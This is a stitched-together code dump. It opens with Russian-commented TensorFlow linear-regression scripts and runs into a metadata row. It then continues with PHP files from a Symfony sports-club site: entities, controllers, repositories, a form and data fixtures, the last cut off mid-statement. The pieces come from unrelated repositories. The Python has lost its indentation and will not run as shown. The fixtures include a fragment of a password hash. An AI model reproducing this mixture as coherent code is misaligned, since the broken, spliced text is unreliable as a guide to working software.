#создаем переменную VARIABLE theta которую будем усовершенствовать
#насколько я понимаю по созданию theta как varible наши оптимизаторы
#будут знать, что нужно делать градиентный спуск именно по theta
theta = tf.Variable(tf.random_uniform([n+1,1], -1.0, -1.0),\
name='theta')
# y_hat=X*theta
y_pred = tf.matmul(X, theta, name='predictions')
# ошибка и ошибка mse с функцией reduce_mean
error = y_pred-y
mse = tf.reduce_mean(tf.square(error), name = 'mse')
# Либо еще проще, используем оптимизатор
optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
training_op = optimizer.minimize(mse)
# эта функция создает нам все переменные заданные выше
init = tf.global_variables_initializer()
# создаем узел saver
saver = tf.train.Saver()
#создание узла сводки (summary) или двоичного журнала для TensorBoard
mse_summary = tf.summary.scalar('MSE', mse)
file_writer = tf.summary.FileWriter(logdir, tf.get_default_graph())
### СТАДИЯ ВЫПОЛНЕНИЯ ###
# создаем сессию внутри блока with (не нужно sess.close())
with tf.Session() as sess:
# действительная инициализация всех переменных
sess.run(init)
# 1000 раз запускаем узел training_op
for epoch in range(n_epochs):
for batch_index in range(n_batches):
X_batch, y_batch = fetch_batch(epoch, batch_index, batch_size)
# чек-поинт, на каждой 100 эпохе создаем
#if epoch % 100 == 0:
# сохраняем сеанс и модель
# save_path = saver.save(sess, "/tmp/my_model.ckpt")
# print("Эпоха", epoch, "MSE =", mse.eval())
# чек-поинт, на каждой 10ой эпохе
if epoch % 10 == 0:
summary_str = mse_summary.eval(feed_dict = {X: X_batch, y: y_batch})
step = epoch * n_batches + batch_index
file_writer.add_summary(summary_str, step)
# тут мы гоняем mse по плоскости, пытаясь найти min
# и вставляем X_batch в placeholder X через параметер feed_dict
sess.run(training_op, feed_dict = {X: X_batch, y: y_batch})
# сохроняем лучшее значение и нашу модель
best_theta = theta.eval()
save_path = saver.save(sess, "/tmp/my_model_final.ckpt")
print(best_theta)
file_writer.close()
### ЗАГРУЗКИ ###
# ~~~~ загружаем предыдущую модель вызывая метод restore объекта Saver
#with tf.Session() as sess:
# saver.restore(sess, "tmp/my_model_final.ckpt")
# ...
# ~~~ использование meta файла для загрузки всей архитектуры графа без надобности
# ~~~ базового кода
#saver = tf.train.import_meta_graph("/tmp/my_model_final.ckpt.meta")
#with tf.Session() as sess:
# saver.restore(sess, "/tmp/my_model_final.ckpt")
# ...
### TENSOR BOARD ###
# как запустить tensorboard с terminal
# $ tensorboard --logdir tf_logs/
<file_sep>/chapter_9/2_расчет_градиента_вручную.py
# Расчет идет по классической линейной регрессии
import sklearn
import tensorflow as tf
import numpy as np
from sklearn.datasets import fetch_california_housing
housing = fetch_california_housing()
m, n = housing.data.shape
housing_data_plus_bias = np.c_[np.ones((m,1)), housing.data]
scaled_housing_data_plus_bias = sklearn.preprocessing.scale(housing_data_plus_bias, axis=0)
n_epochs = 1000
learning_rate = 0.01
X = tf.constant(scaled_housing_data_plus_bias, \
dtype=tf.float32, name='X')
y = tf.constant(housing.target.reshape(-1,1), \
dtype=tf.float32, name='y')
theta = tf.Variable(tf.random_uniform([n+1,1], -1.0, -1.0),\
name='theta')
y_pred = tf.matmul(X, theta, name='predictions')
error = y_pred-y
mse = tf.reduce_mean(tf.square(error), name = 'mse')
gradients = 2/m*tf.matmul(tf.transpose(X), error)
training_op = tf.assign(theta, theta - learning_rate*gradients)
init = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init)
for epoch in range(n_epochs):
if epoch % 100 == 0:
print("Эпоха", epoch, "MSE =", mse.eval())
sess.run(training_op)
best_theta = theta.eval()
#print(best_theta) | 5500769e1c651d2012739db37586268574185751 | [
"Markdown",
"Python"
] | 3 | Markdown | diasirish/hands_on_ML_book_O-Reilly | 5f3c8b34cc7a8f3ca3f6755148b87f0602d399d9 | 6cbc315c25b8b7739acb1564f4246ecdcd3cec41 |
refs/heads/master | <repo_name>AnaisVandenDriessche/MRSPORT<file_sep>/mrsport/src/MrsportBundle/Entity/Club.php
<?php
namespace MrsportBundle\Entity;
use Doctrine\ORM\Mapping as ORM;
/**
 * Doctrine entity for a sports club, persisted in the "mrs_club" table.
 *
 * Pure data holder: every column is exposed through a fluent getter/setter
 * pair, and the club is optionally linked (many-to-one) to the sport it
 * practises. The @ORM annotations below are functional mapping metadata
 * read by Doctrine at runtime — do not edit them casually.
 *
 * @ORM\Table(name="mrs_club")
 * @ORM\Entity(repositoryClass="MrsportBundle\Repository\clubRepository")
 */
class Club
{
    /**
     * Auto-generated surrogate primary key.
     *
     * @var int
     *
     * @ORM\Column(name="id", type="integer")
     * @ORM\Id
     * @ORM\GeneratedValue(strategy="AUTO")
     */
    private $id;
    /**
     * Club name.
     *
     * @var string
     *
     * @ORM\Column(name="name", type="string")
     */
    private $name;
    /**
     * Name of the club's president.
     *
     * @var string
     *
     * @ORM\Column(name="president", type="string")
     */
    private $president;
    /**
     * Name of the club's head coach ("entraineur").
     *
     * @var string
     *
     * @ORM\Column(name="entraineur", type="string")
     */
    private $entraineur;
    /**
     * Foundation date of the club.
     *
     * NOTE(review): the column is a Doctrine "date" type, which hydrates to
     * a \DateTime instance — the previous "@var string" annotation was wrong.
     *
     * @var \DateTime
     *
     * @ORM\Column(name="fondation", type="date")
     */
    private $fondation;
    /**
     * Club colours (free-form text, e.g. jersey colours).
     *
     * @var string
     *
     * @ORM\Column(name="couleur", type="string")
     */
    private $couleur;
    /**
     * Name of the club's home stadium.
     *
     * @var string
     *
     * @ORM\Column(name="stade", type="string")
     */
    private $stade;
    /**
     * URL of the club's official website.
     *
     * @var string
     *
     * @ORM\Column(name="siteweb", type="string")
     */
    private $siteweb;
    /**
     * Contact phone number, stored as text to keep leading zeros and
     * formatting. Optional (nullable column).
     *
     * @var string|null
     *
     * @ORM\Column(name="telephone", type="string", length=50,nullable=true)
     */
    private $telephone;
    /**
     * Contact e-mail address. Optional (nullable column).
     *
     * @var string|null
     *
     * @ORM\Column(name="email", type="string", length= 100,nullable=true)
     */
    private $email;
    /**
     * Moderation status of the club record.
     *
     * One of the raw ENUM values 'valide', 'invalide' or 'new'
     * (mapped with a native MySQL column definition, so no Doctrine
     * type conversion is applied).
     *
     * @var string
     *
     * @ORM\Column(name="status", columnDefinition="ENUM('valide','invalide','new')")
     */
    private $status;
    /**
     * Sport practised by this club (owning side of a many-to-one
     * association; may be null).
     *
     * @ORM\ManyToOne(targetEntity="MrsportBundle\Entity\Sports")
     * @ORM\JoinColumn(nullable=true)
     */
    private $sports;
    /**
     * No-op constructor.
     *
     * The commented-out line below would only be required if $sports were a
     * to-many collection; with the current ManyToOne mapping there is
     * nothing to initialise.
     */
    public function __construct()
    {
        //$this->sports = new ArrayCollection();
    }
    /**
     * Get id.
     *
     * @return int
     */
    public function getId()
    {
        return $this->id;
    }
    /**
     * Set name.
     *
     * @param string $name
     *
     * @return Club fluent interface
     */
    public function setName($name)
    {
        $this->name = $name;
        return $this;
    }
    /**
     * Get name.
     *
     * @return string
     */
    public function getName()
    {
        return $this->name;
    }
    /**
     * Set president.
     *
     * @param string $president
     *
     * @return Club fluent interface
     */
    public function setPresident($president)
    {
        $this->president = $president;
        return $this;
    }
    /**
     * Get president.
     *
     * @return string
     */
    public function getPresident()
    {
        return $this->president;
    }
    /**
     * Set entraineur (head coach name).
     *
     * @param string $entraineur
     *
     * @return Club fluent interface
     */
    public function setEntraineur($entraineur)
    {
        $this->entraineur = $entraineur;
        return $this;
    }
    /**
     * Get entraineur (head coach name).
     *
     * @return string
     */
    public function getEntraineur()
    {
        return $this->entraineur;
    }
    /**
     * Set fondation (foundation date).
     *
     * @param \DateTime $fondation
     *
     * @return Club fluent interface
     */
    public function setFondation($fondation)
    {
        $this->fondation = $fondation;
        return $this;
    }
    /**
     * Get fondation (foundation date).
     *
     * @return \DateTime
     */
    public function getFondation()
    {
        return $this->fondation;
    }
    /**
     * Set couleur (club colours).
     *
     * @param string $couleur
     *
     * @return Club fluent interface
     */
    public function setCouleur($couleur)
    {
        $this->couleur = $couleur;
        return $this;
    }
    /**
     * Get couleur (club colours).
     *
     * @return string
     */
    public function getCouleur()
    {
        return $this->couleur;
    }
    /**
     * Set stade (home stadium name).
     *
     * @param string $stade
     *
     * @return Club fluent interface
     */
    public function setStade($stade)
    {
        $this->stade = $stade;
        return $this;
    }
    /**
     * Get stade (home stadium name).
     *
     * @return string
     */
    public function getStade()
    {
        return $this->stade;
    }
    /**
     * Set siteweb (official website URL).
     *
     * @param string $siteweb
     *
     * @return Club fluent interface
     */
    public function setSiteweb($siteweb)
    {
        $this->siteweb = $siteweb;
        return $this;
    }
    /**
     * Get siteweb (official website URL).
     *
     * @return string
     */
    public function getSiteweb()
    {
        return $this->siteweb;
    }
    /**
     * Set the sport practised by this club.
     *
     * @param \MrsportBundle\Entity\Sports $sports
     *
     * @return Club fluent interface
     */
    public function setSports(\MrsportBundle\Entity\Sports $sports)
    {
        $this->sports = $sports;
        return $this;
    }
    /**
     * Get the sport practised by this club.
     *
     * @return \MrsportBundle\Entity\Sports
     */
    public function getSports()
    {
        return $this->sports;
    }
    /**
     * Set status.
     *
     * @param string $status one of 'valide', 'invalide', 'new'
     *
     * @return Club fluent interface
     */
    public function setStatus($status)
    {
        $this->status = $status;
        return $this;
    }
    /**
     * Get status.
     *
     * @return string one of 'valide', 'invalide', 'new'
     */
    public function getStatus()
    {
        return $this->status;
    }
    /**
     * Set telephone.
     *
     * NOTE(review): the column is a nullable string (length 50) — the
     * previous "@param integer" annotation was wrong.
     *
     * @param string|null $telephone
     *
     * @return Club fluent interface
     */
    public function setTelephone($telephone)
    {
        $this->telephone = $telephone;
        return $this;
    }
    /**
     * Get telephone.
     *
     * @return string|null
     */
    public function getTelephone()
    {
        return $this->telephone;
    }
    /**
     * Set email.
     *
     * @param string|null $email
     *
     * @return Club fluent interface
     */
    public function setEmail($email)
    {
        $this->email = $email;
        return $this;
    }
    /**
     * Get email.
     *
     * @return string|null
     */
    public function getEmail()
    {
        return $this->email;
    }
}
<file_sep>/mrsport/src/MrsportBundle/Controller/SportsController.php
<?php
namespace MrsportBundle\Controller;
use MrsportBundle\Entity\Sports;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\Request;
/**
* Sport controller.
*
*/
class SportsController extends Controller
{
/**
* Lists all sport entities.
*
*/
public function indexAction()
{
$em = $this->getDoctrine()->getManager();
$sports = $em->getRepository('MrsportBundle:Sports')->findAll();
return $this->render('sports/index.html.twig', array(
'sports' => $sports,
));
}
/**
* Creates a new sport entity.
*
*/
public function newAction(Request $request)
{
$sport = new Sports();
$form = $this->createForm('MrsportBundle\Form\SportsType', $sport);
$form->handleRequest($request);
if ($form->isSubmitted() && $form->isValid()) {
$em = $this->getDoctrine()->getManager();
$em->persist($sport);
$em->flush();
return $this->redirectToRoute('sports_show', array('id' => $sport->getId()));
}
return $this->render('sports/new.html.twig', array(
'sport' => $sport,
'form' => $form->createView(),
));
}
/**
* Finds and displays a sport entity.
*
*/
public function showAction(Sports $sport)
{
$deleteForm = $this->createDeleteForm($sport);
return $this->render('sports/show.html.twig', array(
'sport' => $sport,
'delete_form' => $deleteForm->createView(),
));
}
/**
* Displays a form to edit an existing sport entity.
*
*/
public function editAction(Request $request, Sports $sport)
{
$deleteForm = $this->createDeleteForm($sport);
$editForm = $this->createForm('MrsportBundle\Form\SportsType', $sport);
$editForm->handleRequest($request);
if ($editForm->isSubmitted() && $editForm->isValid()) {
$this->getDoctrine()->getManager()->flush();
return $this->redirectToRoute('sports_edit', array('id' => $sport->getId()));
}
return $this->render('sports/edit.html.twig', array(
'sport' => $sport,
'edit_form' => $editForm->createView(),
'delete_form' => $deleteForm->createView(),
));
}
/**
* Deletes a sport entity.
*
*/
public function deleteAction(Request $request, Sports $sport)
{
$form = $this->createDeleteForm($sport);
$form->handleRequest($request);
if ($form->isSubmitted() && $form->isValid()) {
$em = $this->getDoctrine()->getManager();
$em->remove($sport);
$em->flush();
}
return $this->redirectToRoute('sports_index');
}
/**
* Creates a form to delete a sport entity.
*
* @param Sports $sport The sport entity
*
* @return \Symfony\Component\Form\Form The form
*/
private function createDeleteForm(Sports $sport)
{
return $this->createFormBuilder()
->setAction($this->generateUrl('sports_delete', array('id' => $sport->getId())))
->setMethod('DELETE')
->getForm()
;
}
}
<file_sep>/mrsport/src/MrsportBundle/Repository/evenementsRepository.php
<?php
namespace MrsportBundle\Repository;
/**
* evenementsRepository
*
* This class was generated by the Doctrine ORM. Add your own custom
* repository methods below.
*/
class evenementsRepository extends \Doctrine\ORM\EntityRepository
{
public function findlastfive()
{
$qb = $this->createQueryBuilder('e')
->orderBy('e.id', 'DESC')
->getQuery()->setMaxResults(5);
return $qb->execute();
}
public function getEventWithStatus($status = 'valide')
{
$qb = $this->createQueryBuilder('e')
->where("e.status = :identifier")
->orderBy('e.date', 'ASC')
->setParameter(':identifier', $status)
->getQuery();
return $qb->execute();
}
}
<file_sep>/mrsport/README.md
mrsport
=======
A Symfony project created on May 31, 2018, 12:11 pm.
<file_sep>/mrsport/src/MrsportBundle/Controller/DefaultController.php
<?php
namespace MrsportBundle\Controller;
use MrsportBundle\Entity\Club;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use MrsportBundle\Entity\User;
class DefaultController extends Controller
{
public function indexAction()
{
return $this->render('@Mrsport/Default/index.html.twig');
}
public function back_officeAction()
{
return $this->render('@Mrsport/Back_office/index.html.twig');
}
public function basket_resultat_classementAction()
{
return $this->render('@Mrsport/Basket/basket_resultat_classement.html.twig');
}
public function basket_agendaAction()
{
return $this->render('@Mrsport/Basket/basket_agenda.html.twig');
}
public function basketAction()
{
return $this->render('@Mrsport/Basket/basket.html.twig');
}
public function footballAction()
{
return $this->render('@Mrsport/Football/football.html.twig');
}
public function football_agendaAction()
{
return $this->render('@Mrsport/Football/football_agenda.html.twig');
}
public function football_resultat_classementAction()
{
return $this->render('@Mrsport/Football/football_resultat_classement.html.twig');
}
public function liste_clubAction()
{
return $this->render('@Mrsport/Club/liste_club.html.twig');
}
public function liste_club_footballAction()
{
// requete
$em = $this->getDoctrine()->getManager();
$clubsfootball = $em->getRepository(Club::class)->findBy(
array( 'sports' => 1)
);
return $this->render('@Mrsport/Club/liste_club_football.html.twig',
array(
'clubs' => $clubsfootball
));
}
public function liste_club_basketAction()
{
// requete
$em = $this->getDoctrine()->getManager();
$clubsbasket = $em->getRepository(Club::class)->findBy(
array( 'sports' => 4)
);
return $this->render('@Mrsport/Club/liste_club_basket.html.twig',
array(
'clubs' => $clubsbasket
));
}
public function liste_club_rugbyAction()
{
// requete
$em = $this->getDoctrine()->getManager();
$clubsrugby = $em->getRepository(Club::class)->findBy(
array( 'sports' => 2)
);
return $this->render('@Mrsport/Club/liste_club_rugby.html.twig',
array(
'clubs' => $clubsrugby
));
}
public function liste_club_hockeyAction()
{
// requete
$em = $this->getDoctrine()->getManager();
$clubshockey = $em->getRepository(Club::class)->findBy(
array( 'sports' => 3)
);
return $this->render('@Mrsport/Club/liste_club_hockey.html.twig',
array(
'clubs' => $clubshockey
));
}
public function single_clubAction()
{
return $this->render('@Mrsport/Club/single_club.html.twig');
}
public function contactAction()
{
return $this->render('@Mrsport/Contact/contact.html.twig');
}
public function hockey_agendaAction()
{
return $this->render('@Mrsport/Hockey/hockey_agenda.html.twig');
}
public function hockey_resultat_classementAction()
{
return $this->render('@Mrsport/Hockey/hockey_resultat_classement.html.twig');
}
public function hockeyAction()
{
return $this->render('@Mrsport/Hockey/hockey.html.twig');
}
public function rugbyAction()
{
return $this->render('@Mrsport/Rugby/rugby.html.twig');
}
public function rugby_resultat_classementAction()
{
return $this->render('@Mrsport/Rugby/rugby_resultat_classement.html.twig');
}
public function rugby_agendaAction()
{
return $this->render('@Mrsport/Rugby/rugby_agenda.html.twig');
}
public function evenementAction()
{
return $this->render('@Mrsport/Evenement/evenement.html.twig');
}
public function dashboardAction()
{
// doctrine
$em = $this->getDoctrine()->getManager();
$users = $em->getRepository('MrsportBundle:User')->findlastfive();
$evenements = $em->getRepository('MrsportBundle:Evenements')->findlastfive();
$clubs = $em->getRepository('MrsportBundle:Club')->findlastfive();
return $this->render('@Mrsport/admin/dashboard.html.twig',array(
'users' => $users,
'evenements' => $evenements,
'clubs' => $clubs,
));
}
public function listing_usersAction()
{
return $this->render('@Mrsport/admin/listing_users.html.twig');
}
public function validation_clubAction()
{
return $this->render('@Mrsport/admin/validation_club.html.twig');
}
public function validation_evenementAction()
{
return $this->render('@Mrsport/admin/validation_evenement.html.twig');
}
}
<file_sep>/mrsport/src/MrsportBundle/Repository/UserRepository.php
<?php
namespace MrsportBundle\Repository;
/**
* sportsRepository
*
* This class was generated by the Doctrine ORM. Add your own custom
* repository methods below.
*/
class UserRepository extends \Doctrine\ORM\EntityRepository
{
public function findlastfive()
{
$qb = $this->createQueryBuilder('u')
->orderBy('u.lastLogin', 'DESC')
->getQuery()->setMaxResults(5);
return $qb->execute();
}
}
<file_sep>/mrsport/src/MrsportBundle/MrsportBundle.php
<?php
namespace MrsportBundle;
use Symfony\Component\HttpKernel\Bundle\Bundle;
class MrsportBundle extends Bundle
{
}
<file_sep>/mrsport/src/MrsportBundle/Form/ClubType.php
<?php
namespace MrsportBundle\Form;
use Symfony\Component\Form\AbstractType;
use Symfony\Component\Form\FormBuilderInterface;
use Symfony\Component\OptionsResolver\OptionsResolver;
use Symfony\Component\Form\Extension\Core\Type\DateType;
use Symfony\Bridge\Doctrine\Form\Type\EntityType;
use Symfony\Component\Form\Extension\Core\Type\TextType;
use MrsportBundle\Entity\Sports;
class ClubType extends AbstractType
{
/**
* {@inheritdoc}
*/
public function buildForm(FormBuilderInterface $builder, array $options)
{
$builder
->add('name',TextType::class, [
"required" => true
])
->add('president', TextType::class, [
"required" => true
])
->add('entraineur', TextType::class, [
"required" => true
])
->add('fondation',DateType::class,array(
'widget' => 'choice',
'format' => 'y-M-d',
))
->add('couleur', TextType::class, [
"required" => true
])
->add('stade', TextType::class, [
"required" => true
])
->add('siteweb', TextType::class, [
"required" => true
])
->add('telephone', TextType::class, [
"required" => true
])
->add('email', TextType::class, [
"required" => true
])
->add('sports',EntityType::class, array(
'class' => Sports::class,
// 'choice_label' => 'name',
'multiple' => false,
'expanded' => true,
//'mapped' => false
//'multiple' => true,
));
}/**
* {@inheritdoc}
*/
public function configureOptions(OptionsResolver $resolver)
{
$resolver->setDefaults(array(
'data_class' => 'MrsportBundle\Entity\Club'
));
}
/**
* {@inheritdoc}
*/
public function getBlockPrefix()
{
return 'mrsportbundle_club';
}
}
<file_sep>/mrsport/src/MrsportBundle/Entity/Evenements.php
<?php
namespace MrsportBundle\Entity;
use Doctrine\ORM\Mapping as ORM;
/**
* evenements
*
* @ORM\Table(name="mrs_evenements")
* @ORM\Entity(repositoryClass="MrsportBundle\Repository\evenementsRepository")
*/
class Evenements
{
/**
* @var int
*
* @ORM\Column(name="id", type="integer")
* @ORM\Id
* @ORM\GeneratedValue(strategy="AUTO")
*/
private $id;
/**
* @var string
*
* @ORM\Column(name="name", type="string")
*/
private $name;
/**
* @var date
*
* @ORM\Column(name="date", type="date")
*/
private $date;
/**
* @var time
*
* @ORM\Column(name="time", type="time")
*/
private $time;
/**
* @var string
*
* @ORM\Column(name="adresse", type="string")
*/
private $adresse;
/**
* @var string
*
* @ORM\Column(name="ville", type="string")
*/
private $ville;
/**
* @var description
*
* @ORM\Column(name="description", type="text", length= 500)
*/
private $description;
/**
* @var string
*
* @ORM\Column(name="telephone", type="string", length=50,nullable=true)
*/
private $telephone;
/**
* @var string
*
* @ORM\Column(name="email", type="string", length= 100,nullable=true)
*/
private $email;
/**
* @var status
*
* @ORM\Column(name="status", columnDefinition="ENUM('valide','invalide','new')")
*/
private $status;
/**
* @ORM\ManyToOne(targetEntity="MrsportBundle\Entity\Sports")
* @ORM\JoinColumn(nullable=true)
*/
private $sports;
/**
* Get id.
*
* @return int
*/
public function getId()
{
return $this->id;
}
/**
* Set date.
*
* @param \DateTime $date
*
* @return evenements
*/
public function setDate($date)
{
$this->date = $date;
return $this;
}
/**
* Get date.
*
* @return \DateTime
*/
public function getDate()
{
return $this->date;
}
/**
* Set time.
*
* @param \DateTime $time
*
* @return evenements
*/
public function setTime($time)
{
$this->time = $time;
return $this;
}
/**
* Get time.
*
* @return \DateTime
*/
public function getTime()
{
return $this->time;
}
/**
* Set adresse.
*
* @param string $adresse
*
* @return evenements
*/
public function setAdresse($adresse)
{
$this->adresse = $adresse;
return $this;
}
/**
* Get adresse.
*
* @return string
*/
public function getAdresse()
{
return $this->adresse;
}
/**
* Set description.
*
* @param string $description
*
* @return evenements
*/
public function setDescription($description)
{
$this->description = $description;
return $this;
}
/**
* Get description.
*
* @return string
*/
public function getDescription()
{
return $this->description;
}
/**
* Set sports.
*
* @param \MrsportBundle\Entity\Sports $sports
*
* @return evenements
*/
public function setSports(\MrsportBundle\Entity\Sports $sports)
{
$this->sports = $sports;
return $this;
}
/**
* Get sports.
*
* @return \MrsportBundle\Entity\Sports
*/
public function getSports()
{
return $this->sports;
}
/**
* Set ville.
*
* @param string $ville
*
* @return Evenements
*/
public function setVille($ville)
{
$this->ville = $ville;
return $this;
}
/**
* Get ville.
*
* @return string
*/
public function getVille()
{
return $this->ville;
}
/**
* Set name.
*
* @param string $name
*
* @return Evenements
*/
public function setName($name)
{
$this->name = $name;
return $this;
}
/**
* Get name.
*
* @return string
*/
public function getName()
{
return $this->name;
}
/**
* Set status.
*
* @param string $status
*
* @return Evenements
*/
public function setStatus($status)
{
$this->status = $status;
return $this;
}
/**
* Get status.
*
* @return string
*/
public function getStatus()
{
return $this->status;
}
/**
* Set telephone.
*
* @param integer $telephone
*
* @return Evenements
*/
public function setTelephone($telephone)
{
$this->telephone = $telephone;
return $this;
}
/**
* Get telephone.
*
* @return integer
*/
public function getTelephone()
{
return $this->telephone;
}
/**
* Set email.
*
* @param string $email
*
* @return Evenements
*/
public function setEmail($email)
{
$this->email = $email;
return $this;
}
/**
* Get email.
*
* @return string
*/
public function getEmail()
{
return $this->email;
}
}
<file_sep>/mrsport/src/AppBundle/DataFixtures/AppFixtures.php
<?php
// src/DataFixtures/AppFixtures.php
namespace AppBundle\DataFixtures;
// use App\Entity\Product;
use MrsportBundle\Entity\User;
use MrsportBundle\Entity\Sports;
use MrsportBundle\Entity\Club;
use MrsportBundle\Entity\Evenements;
use Doctrine\Bundle\FixturesBundle\Fixture;
use Doctrine\Common\Persistence\ObjectManager;
class AppFixtures extends Fixture
{
public function load(ObjectManager $manager)
{
// USER
$user = new User();
$user->setUsername('weblitzer');
$user->setEmail('<EMAIL>');
$user->setPassword('<PASSWORD>');
$user->setRoles(['ROLE_SUPER_ADMIN']);
$user->setEnabled(true);
$manager->persist($user);
$user = new User();
$user->setUsername('nathan');
$user->setEmail('<EMAIL>');
$user->setPassword('<PASSWORD>');
$user->setRoles(['ROLE_SUPER_ADMIN']);
$user->setEnabled(true);
$manager->persist($user);
$user = new User();
$user->setUsername('anais');
$user->setEmail('<EMAIL>');
$user->setPassword('<PASSWORD>');
$user->setRoles(['ROLE_SUPER_ADMIN']);
$user->setEnabled(true);
$manager->persist($user);
$user = new User();
$user->setUsername('zizou');
$user->setEmail('<EMAIL>');
$user->setPassword('<PASSWORD>0Vz7moaJtdc0eGTkhCJp/t3sAU/HpB9XWL9KzBpxmcBG');
$user->setRoles(['']);
$user->setEnabled(true);
$manager->persist($user);
$user = new User();
$user->setUsername('serena');
$user->setEmail('<EMAIL>');
$user->setPassword('<PASSWORD>');
$user->setRoles(['']);
$user->setEnabled(true);
$manager->persist($user);
$user = new User();
$user->setUsername('stephen');
$user->setEmail('<EMAIL>');
$user->setPassword('<PASSWORD>');
$user->setRoles(['']);
$user->setEnabled(true);
$manager->persist($user);
$user = new User();
$user->setUsername('lebron');
$user->setEmail('<EMAIL>');
$user->setPassword('<PASSWORD>');
$user->setRoles(['']);
$user->setEnabled(true);
$manager->persist($user);
// Sport
$sport = new Sports();
$sport->setName('Football');
$manager->persist($sport);
$sport2 = new Sports();
$sport2->setName('Rugby');
$manager->persist($sport2);
$sport3 = new Sports();
$sport3->setName('Hockey');
$manager->persist($sport3);
$sport4 = new Sports();
$sport4->setName('Basket');
$manager->persist($sport4);
// Club
$date = new \DateTime('1899-07-11');
$club = new Club();
$club->setName('<NAME>');
$club->setPresident('<NAME>');
$club->setEntraineur('<NAME>');
$club->setFondation($date);
$club->setCouleur('rouge et blanc');
$club->setStade('Stade Robert-Diochon');
$club->setSiteweb('fcrouen.fr');
$club->setSports($sport);
$club->setTelephone('0235806565');
$club->setEmail('<EMAIL>');
$club->setStatus('invalide');
$manager->persist($club);
$date2 = new \DateTime('2017-06-12');
$club = new Club();
$club->setName('<NAME>ockey élite 76');
$club->setPresident('<NAME>');
$club->setEntraineur('<NAME> et <NAME>');
$club->setFondation($date2);
$club->setCouleur('noir et jaune');
$club->setStade('L\'Île Lacroix');
$club->setSiteweb('rouenhockeyelite76.com');
$club->setSports($sport3);
$club->setTelephone('0235806565');
$club->setEmail('<EMAIL>');
$club->setStatus('new');
$manager->persist($club);
$date2 = new \DateTime('2011-06-12');
$club = new Club();
$club->setName('<NAME>');
$club->setPresident('<NAME>');
$club->setEntraineur('<NAME>');
$club->setFondation($date2);
$club->setCouleur('Noir et blanc');
$club->setStade('stade Jean-Mermoz');
$club->setSiteweb('rouen-normandie-rugby.fr');
$club->setSports($sport2);
$club->setTelephone('0235806565');
$club->setEmail('<EMAIL>');
$club->setStatus('new');
$manager->persist($club);
$date2 = new \DateTime('2011-07-01');
$club = new Club();
$club->setName('<NAME>');
$club->setPresident('<NAME>');
$club->setEntraineur('<NAME>');
$club->setFondation($date2);
$club->setCouleur('Bleu, blanc et orange');
$club->setStade('Kindarena');
$club->setSiteweb('rouenmetrobasket.com');
$club->setSports($sport4);
$club->setTelephone('0235806565');
$club->setEmail('<EMAIL>');
$club->setStatus('valide');
$manager->persist($club);
$date2 = new \DateTime('2011-07-01');
$club = new Club();
$club->setName('<NAME>');
$club->setPresident('<NAME>');
$club->setEntraineur('<NAME>');
$club->setFondation($date2);
$club->setCouleur('Rose et noir');
$club->setStade('Stade Stanislas Bilyk');
$club->setSiteweb('https://www.fff.fr/la-vie-des-clubs/183800/infos-cles');
$club->setSports($sport);
$club->setTelephone('0235806565');
$club->setEmail('<EMAIL>');
$club->setStatus('valide');
$manager->persist($club);
$date2 = new \DateTime('1942-09-01');
$club = new Club();
$club->setName('SSCC BASKET');
$club->setPresident('<NAME>');
$club->setEntraineur('DUBOSC David');
$club->setFondation($date2);
$club->setCouleur('Rose et noir');
$club->setStade('Stade Sotteville-lès-Rouen');
$club->setSiteweb('http://www.sotteville-basket.fr');
$club->setSports($sport4);
$club->setTelephone('0235806565');
$club->setEmail('<EMAIL>');
$club->setStatus('valide');
$manager->persist($club);
$date2 = new \DateTime('1942-09-01');
$club = new Club();
$club->setName('Association Sportive Rouen Université Club Section Rugby');
$club->setPresident('<NAME>');
$club->setEntraineur('<NAME>');
$club->setFondation($date2);
$club->setCouleur('Vert et noir');
$club->setStade('Stade Mont Saint Aignan');
$club->setSiteweb('http://rugby.asrouenuc.com');
$club->setSports($sport2);
$club->setTelephone('0235806565');
$club->setEmail('<EMAIL>');
$club->setStatus('valide');
$manager->persist($club);
// Evenement
$date3 = '2018-06-12';
$time = '15:30';
$evenement = new Evenements();
$evenement->setName('Rencontre sportives');
$evenement->setDate(\DateTime::createFromFormat('Y-m-d', $date3));
$evenement->setTime(\DateTime::createFromFormat('H:i', $time));
$evenement->setAdresse('23 rue <NAME>');
$evenement->setDescription('Rencontre sportives');
$evenement->setVille('Soteville-Lès-Rouen');
$evenement->setStatus('valide');
$evenement->setTelephone('0235806565');
$evenement->setEmail('<EMAIL>');
$manager->persist($evenement);
$date3 = '2018-09-18';
$time = '09:30';
$evenement = new Evenements();
$evenement->setName('<NAME>');
$evenement->setDate(\DateTime::createFromFormat('Y-m-d', $date3));
$evenement->setTime(\DateTime::createFromFormat('H:i', $time));
$evenement->setAdresse('hôtel de ville');
$evenement->setDescription('Marathon');
$evenement->setVille('Rouen');
$evenement->setTelephone('0235806565');
$evenement->setEmail('<EMAIL>');
$evenement->setStatus('valide');
$manager->persist($evenement);
$date3 = '2018-05-01';
$time = '09:30';
$evenement = new Evenements();
$evenement->setName('24h motonautiques');
$evenement->setDate(\DateTime::createFromFormat('Y-m-d', $date3));
$evenement->setTime(\DateTime::createFromFormat('H:i', $time));
$evenement->setAdresse('quai du Havre');
$evenement->setDescription('24h motonautiques');
$evenement->setVille('Rouen');
$evenement->setTelephone('0235806565');
$evenement->setEmail('<EMAIL>');
$evenement->setStatus('invalide');
$manager->persist($evenement);
$date3 = '2018-06-01';
$time = '08:30';
$evenement = new Evenements();
$evenement->setName('<NAME>');
$evenement->setDate(\DateTime::createFromFormat('Y-m-d', $date3));
$evenement->setTime(\DateTime::createFromFormat('H:i', $time));
$evenement->setAdresse('quai du Havre');
$evenement->setDescription('triahlon');
$evenement->setVille('Rouen');
$evenement->setTelephone('0235806565');
$evenement->setEmail('<EMAIL>');
$evenement->setStatus('new');
$manager->persist($evenement);
$date3 = '2018-01-01';
$time = '19:00';
$evenement = new Evenements();
$evenement->setName('Zumba');
$evenement->setDate(\DateTime::createFromFormat('Y-m-d', $date3));
$evenement->setTime(\DateTime::createFromFormat('H:i', $time));
$evenement->setAdresse('Kindarena');
$evenement->setDescription('Zumba');
$evenement->setVille('Rouen');
$evenement->setTelephone('0235806565');
$evenement->setEmail('<EMAIL>');
$evenement->setStatus('new');
$manager->persist($evenement);
$date3 = '2018-06-01';
$time = '13:00';
$evenement = new Evenements();
$evenement->setName('Baseball - European Champion’s Cup');
